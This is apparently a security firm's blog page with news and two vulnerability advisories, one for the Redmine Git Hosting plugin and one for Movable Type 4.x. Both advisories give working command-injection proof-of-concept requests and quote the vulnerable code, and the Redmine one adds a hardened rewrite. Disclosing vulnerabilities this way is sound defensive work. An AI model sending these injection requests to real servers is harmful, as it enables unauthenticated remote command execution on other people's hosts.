Sec-1 Supports 2013 Cyber Security Challenge

Sec-1 is delighted to have supported the 2013 Cyber Security Challenge UK last weekend as part of the first cyber camp of its kind to be held in Scotland.

The Cyber Security Challenge is a nationwide set of competitions to recruit talented people into the field of cyber security to continue the UK’s fight against online crime.



Paper: Automated Scanning v Manual Testing: Do you know the difference?

Automated scanning tools have their place, but should never be seen as a replacement for manual testing and an effective combined security strategy. We’ve produced a whitepaper explaining why. Below you will find a couple of short snippets from the paper:

What is automated scanning?

Simply put, automated testing is a means to provide breadth during a security assessment to reduce the time and effort required to discover and report on issues.



Milestone Office Move For Sec-1

As the threat of cybercrime increases, Sec-1 Ltd prepares to accelerate its growth.

By making a significant investment in new premises; the recruitment of more of the best ‘ethical hacker’ talent; and leading-edge research and development initiatives, the business is well-placed to respond to the increase in demand for accredited information security solutions.

The team has recently moved from office space in Stanningley into larger, newly refurbished premises at Centre 27 Business Park in Birstall.



Redmine Git Hosting Plugin: Remote Command Execution

Sec-1 Security Advisory
Advisory Name : Redmine Git Hosting Plugin: Remote Command Execution
Discovery Date : 3/7/2013
Release Date : 16/8/2013
Application : Redmine Git Hosting Plugin
Platform : Any
Severity : HIGH. Remote Command Execution
CVE : CVE-2013-4663
Discovered by : Nick Blundell
Vendor Status : Some have patched the plugin
Website : http://www.sec-1.com/blog

Vulnerability Summary

A command execution vulnerability exists in the redmine_git_hosting plugin, which integrates git server functionality into redmine. No authentication is required for exploitation via public projects, where clone (i.e. read-only) access to git repositories is permitted; otherwise a valid account with such access is required.

The vulnerability lies in the HTTP git transport handler provided by the plugin, which fails to sanitise input from which the backend git commands are constructed.

The vulnerable URI is that used in the git clone command, which can usually be found on a particular project’s page, or fabricated if the name of a project is known, for example: https://redmine.somewhere.com/someproject.git

Exploit Example

There are several possible requests to trigger the same vulnerable code, though the following delay injection proof-of-concept request was found to work on all variant forks of the redmine plugin:

curl -k "https://redmine.demo.com/someproject.git/info/refs?service=git-%60sleep%2010%60"

Vulnerable Code

There are several instances within the code of the HTTP git transport controller (git_http_controller.rb) of the redmine_git_hosting plugin where backend git commands are constructed with unsanitised user input, for example:

# Note: here service name may be controlled by the user

def get_info_refs
  service_name = get_service_type
  if service_name
    # service_name is interpolated straight into a shell command string
    command = git_command("#{service_name} --stateless-rpc --advertise-refs .")
    refs = %x[#{command}]
    content_type = "application/x-git-#{service_name}-advertisement"
    # ...
  end
end

# Note: Here reqfile may be controlled by the user

def file_exists(reqfile)
  # reqfile is interpolated into a shell test; a quote in reqfile ends the string early
  cmd="#{run_git_prefix()} if [ -e \"#{reqfile}\" ] ; then echo found ; else echo bad ; fi ' "
  is_found=%x[#{cmd}]
  is_found.chomp!
  return is_found == "found"
end

Exploit Code

Vendor Response

Since there is no official owner of this plugin, on 4th July 2013 several of the prominent fork developers were contacted, including the redmine team for their information, and of the two that replied one has responded with a patch for the plugin (see http://www.redmine.org/plugins/redmine-gitolite).

An offer was made to test any patched instances of the plugin, though as yet no developers have responded to have their patches confirmed with an instance running their forked code.

Recommendation

Ideally, the plugin should be re-written to use parametrised task execution of the git command, or at the very least the input should be whitelisted on a word or character level. If unsure, it is recommended that HTTP transport functionality be disabled on the redmine_git_hosting plugin until a fix has been confirmed.
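The recommendation above, worked through for the two functions quoted in the advisory, as an added example rather than the plugin's own code: the service name is checked against the only two services the git smart-HTTP protocol ever requests, git is invoked with an argument array so no shell parses user input, and the file check uses Ruby's own filesystem calls confined to the repository directory. The repository path arguments are assumptions.

```ruby
require "open3"
require "pathname"
require "tmpdir"

# Hardened rewrite of the two plugin functions (added example, not the
# plugin's code). Only these two services exist in the smart-HTTP protocol,
# so anything else is rejected before any command is built.
ALLOWED_SERVICES = %w[git-upload-pack git-receive-pack].freeze

# Returns the service name if it is on the allow-list, otherwise nil.
def validated_service(param)
  ALLOWED_SERVICES.include?(param) ? param : nil
end

# Builds the advertise-refs command as an argv array. Each element reaches
# git as one argument; no shell sees the string, so `...` or ; cannot inject.
def info_refs_argv(service_name, repo_path)
  svc = validated_service(service_name)
  return nil unless svc
  [svc, "--stateless-rpc", "--advertise-refs", repo_path]
end

# Runs the argv form. Open3.capture2 with several arguments execs the
# program directly and never spawns /bin/sh.
def advertise_refs(service_name, repo_path)
  argv = info_refs_argv(service_name, repo_path)
  return nil unless argv
  out, status = Open3.capture2(*argv)
  status.success? ? out : nil
end

# Replacement for file_exists: no shell at all, and reqfile is confined to
# the repository directory so "../" or an absolute path cannot escape it.
def repo_file_exists?(repo_root, reqfile)
  root = Pathname.new(repo_root).realpath
  target = (root + reqfile).cleanpath
  return false unless target.to_s.start_with?(root.to_s + File::SEPARATOR)
  target.exist?
end
```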

Copyright 2013 Sec-1 LTD. All rights reserved.


Moveable Type 4.x Unauthenticated Remote Command Execution

Sec-1 Security Advisory
Advisory Name : Moveable Type 4.x Unauthenticated Remote Command Execution via mt-upgrade.cgi
Discovery Date : 7/11/2012
Release Date : 22/1/2013
Application : Moveable Type 4.x
Platform : Any
Severity : HIGH. Unauthenticated Remote Command Execution
CVE : CVE-2013-0209 CVE-2012-6315
Discovered by : Nick Blundell
Vendor Status : Released patch for unmaintained 4.x branch
Website : http://www.sec-1.com/blog

Vulnerability Summary:

By directly calling an update-related CGI script with crafted input, and without requiring authentication, it is possible to execute arbitrary system commands on the host server.

MoveableType (MT) exposes a CGI script, mt-upgrade.cgi (usually at /cgi/mt/mt-upgrade.cgi), that is used during installation and updating of the platform. The vulnerability arises due to the following properties:

  1. This script may be invoked remotely without requiring authentication to any MT instance.
  2. Through a crafted POST request, it is possible to invoke particular database migration functions (i.e functions that bring the existing database up-to-date with an updated codebase) by name and with particular parameters.
  3. A particular migration function, core_drop_meta_for_table, allows a class parameter to be set which is used directly in a perl eval statement, allowing perl code injection.

Exploit Example:

With the following POST request we can gain unauthenticated code execution on the hosting server:

POST /cgi/mt/mt-upgrade.cgi HTTP/1.1
Host: [mt host name here]
Proxy-Connection: keep-alive
User-Agent: Mozilla/5...
Accept: */*
Content-Type: application/x-www-form-urlencoded
Content-Length: 104

__mode=run_actions&installing=1&steps=[["core_drop_meta_for_table","class","`COMMAND_PAYLOAD_HERE`"]]

Vulnerable Code:

The vulnerable code lies in: lib/MT/Upgrade.pm

sub core_drop_meta_for_table {
  my $self = shift;
  my (%param) = @_;
  my $class = $param{class};
  my $sql = $param{sql};
  eval "require $class;";    # <--- $class comes straight from the request and is evaluated as Perl
  my $driver = $class->dbi_driver;
  my $dbh = $driver->rw_handle;
  my $err;
  eval {
    $dbh->do($sql) or $err = $dbh->errstr;
  };
  # ignore drop errors; the column has probably been
  # removed already
  #if ($err) {
  #    print STDERR "$err: $sql\n";
  #}
  return 0;
}

Exploit Code:

Metasploit exploit: movabletype_upgrade_exec.rb
Author(s): Kacper Nowak

Vendor Response:

Although the vendors no longer actively maintain the 4.x branch, they have published a patch to fix the issue: http://www.movabletype.org/2013/01/movable_type_438_patch.html

Copyright 2013 Sec-1 LTD. All rights reserved.

Paper: Exploiting Transparent User Identification

This whitepaper details how a common mechanism employed by multiple Internet filtering and firewall vendors can be leveraged to gain local administrator access to domain clients, followed by domain wide administrator access given a set of conditions.

Download:

Whitepaper (PDF)
Whitepaper & PoC (ZIP)
